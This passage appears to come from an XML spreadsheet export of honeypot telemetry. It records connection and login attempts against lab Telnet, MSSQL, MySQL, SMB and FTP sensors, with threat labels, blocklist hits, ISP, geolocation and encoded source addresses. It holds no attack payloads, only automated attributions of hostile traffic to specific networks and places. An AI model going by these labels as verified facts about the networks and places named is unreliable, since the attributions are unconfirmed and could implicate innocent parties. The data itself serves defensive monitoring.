    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;3306&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Panipat"/>
    <s v="Samālkha"/>
    <s v="1257566"/>
    <s v="132101"/>
    <s v="29.2405"/>
    <s v="77.0118"/>
    <s v="138260"/>
    <s v="Shirsty Internet Services Pvt Ltd"/>
    <s v="Shirsty Internet Services Pvt Ltd"/>
    <s v="business"/>
    <s v="Shirsty  Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="query&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.124.173.31,52027)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:677c:ad1f"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1503"/>
    <x v="1503"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T11:10:24"/>
    <d v="2024-09-09T06:41:00"/>
    <d v="2025-04-16T11:10:24"/>
    <n v="77"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_MT-CPA_H43"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;161&amp;&amp;59731&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b008:8ae3"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1504"/>
    <x v="1504"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T11:08:39"/>
    <d v="2025-02-21T16:01:32"/>
    <d v="2025-04-16T11:08:39"/>
    <n v="485"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3306&amp;&amp;31138&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="400619"/>
    <s v="AROSSCLOUD INC."/>
    <s v="Fastmos Co Limited"/>
    <s v="hosting"/>
    <s v="Fastmos Co Limited"/>
    <s v="2016-09-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9acc:b116"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1505"/>
    <x v="1505"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T11:06:20"/>
    <d v="2025-04-16T09:57:25"/>
    <d v="2025-04-16T11:06:20"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="NA"/>
    <s v="Istanbul"/>
    <s v="745044"/>
    <s v="34122"/>
    <s v="41.0082"/>
    <s v="28.9784"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelecom"/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="2005-10-27"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:58f7:987c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1506"/>
    <x v="1506"/>
    <s v="bcano.tcif.telstra.com.au"/>
    <x v="0"/>
    <d v="2025-04-16T10:54:06"/>
    <d v="2025-04-16T10:51:23"/>
    <d v="2025-04-16T10:54:06"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="NSW"/>
    <s v="New South Wales"/>
    <s v="NA"/>
    <s v="Sydney"/>
    <s v="2147714"/>
    <s v="1001"/>
    <s v="-33.8688"/>
    <s v="151.209"/>
    <s v="1221"/>
    <s v="Telstra Limited"/>
    <s v="Telstra Corporation"/>
    <s v="business"/>
    <s v="Telstra Corporation Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2025-03-13 02:50:02"/>
    <s v="['a1-185.akam.net', 'a11-66.akam.net', 'a18-64.akam.net', 'a2-65.akam.net', 'a28-66.akam.net', 'a3-65.akam.net', 'adns05.bigpond.com', 'adns06.bigpond.com']"/>
    <s v="Corporation Service Company (Aust) Pty Ltd"/>
    <s v="['clientDeleteProhibited https://identitydigital.au/get-au/whois-status-codes#clientDeleteProhibited', 'serverDeleteProhibited https://identitydigital.au/get-au/whois-status-codes#serverDeleteProhibited', 'serverTransferProhibited https://identitydigital.au/get-au/whois-status-codes#serverTransferProhibited', 'serverUpdateProhibited https://identitydigital.au/get-au/whois-status-codes#serverUpdateProhibited']"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cb23:5285"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="High&amp;&amp;Medium"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1507"/>
    <x v="1507"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T10:47:45"/>
    <d v="2025-02-12T17:56:14"/>
    <d v="2025-04-16T10:47:45"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="NA"/>
    <s v="Mumbai (Malad West)"/>
    <s v="1275339"/>
    <s v="400064"/>
    <s v="19.1841"/>
    <s v="72.8357"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="ABTS-MUMBAI"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa9:6395"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1508"/>
    <x v="1508"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T10:44:44"/>
    <d v="2025-03-18T14:23:15"/>
    <d v="2025-04-16T10:44:44"/>
    <n v="28"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7361:39a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1509"/>
    <x v="1509"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T10:36:13"/>
    <d v="2025-04-16T10:34:51"/>
    <d v="2025-04-16T10:36:13"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Konkan Division"/>
    <s v="Mumbai (Kamathipura)"/>
    <s v="1275339"/>
    <s v="400008"/>
    <s v="18.9623"/>
    <s v="72.8226"/>
    <s v="55352"/>
    <s v="Microscan Internet Limited"/>
    <s v="United Stars"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2015-10-09"/>
    <s v="UNITED-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67c5:e068"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1510"/>
    <x v="1510"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T10:28:35"/>
    <d v="2025-04-16T10:28:01"/>
    <d v="2025-04-16T10:28:35"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="65"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Medchal Malkajgiri"/>
    <s v="Medchal"/>
    <s v="1263226"/>
    <s v="NA"/>
    <s v="17.6297"/>
    <s v="78.4814"/>
    <s v="45582"/>
    <s v="VAINAVI INDUSTIES LTD, INTERNET SERVICE PROVIDER, INDIA"/>
    <s v="VAINAVIINDUSTRIESLTD"/>
    <s v="business"/>
    <s v="Jesmi Online PVT LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6734:2498"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1511"/>
    <x v="1511"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T10:26:50"/>
    <d v="2025-04-08T11:29:01"/>
    <d v="2025-04-16T10:26:50"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Medchal Malkajgiri"/>
    <s v="Medchal"/>
    <s v="1263226"/>
    <s v="NA"/>
    <s v="17.6297"/>
    <s v="78.4814"/>
    <s v="45582"/>
    <s v="VAINAVI INDUSTIES LTD, INTERNET SERVICE PROVIDER, INDIA"/>
    <s v="VAINAVIINDUSTRIESLTD"/>
    <s v="business"/>
    <s v="Jesmi Online PVT LTD"/>
    <s v="2015-03-04"/>
    <s v="SKYNETWORKS"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6734:2444"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1512"/>
    <x v="1512"/>
    <s v="218-161-61-155.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T10:10:15"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-16T10:10:15"/>
    <n v="546"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H26&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;23628&amp;&amp;23&amp;&amp;NA&amp;&amp;9100&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:daa1:3d9b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1513"/>
    <x v="1513"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T09:47:02"/>
    <d v="2025-04-09T04:34:45"/>
    <d v="2025-04-16T09:47:02"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv (Obolons'kyi district)"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.5208"/>
    <s v="30.5216"/>
    <s v="13188"/>
    <s v="CONTENT DELIVERY NETWORK LTD"/>
    <s v="Triolan"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-04-15"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b297:aef3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1514"/>
    <x v="1514"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T09:36:22"/>
    <d v="2023-11-27T18:55:19"/>
    <d v="2025-04-16T09:36:22"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="45204&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:408d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1515"/>
    <x v="1515"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T09:30:12"/>
    <d v="2024-04-11T10:58:00"/>
    <d v="2025-04-16T09:30:12"/>
    <n v="60"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="50991&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="AT"/>
    <s v="Austria"/>
    <s v="7"/>
    <s v="Tyrol"/>
    <s v="Innsbruck"/>
    <s v="Innsbruck"/>
    <s v="2775220"/>
    <s v="NA"/>
    <s v="47.2627"/>
    <s v="11.3945"/>
    <s v="31543"/>
    <s v="myNet GmbH"/>
    <s v="myNet GmbH"/>
    <s v="business"/>
    <s v="myNET Internet Solutions"/>
    <s v="2004-03-17"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:53da:bd20"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1516"/>
    <x v="1516"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T09:29:44"/>
    <d v="2024-12-04T12:53:20"/>
    <d v="2025-04-16T09:29:44"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_FTP_HC1"/>
    <s v="21"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="CK"/>
    <s v="Cook Islands"/>
    <s v="NA"/>
    <s v="Rarotonga"/>
    <s v="NA"/>
    <s v="Avarua"/>
    <s v="4035715"/>
    <s v="NA"/>
    <s v="-21.2075"/>
    <s v="-159.775"/>
    <s v="10131"/>
    <s v="Telecom Cook Islands Ltd"/>
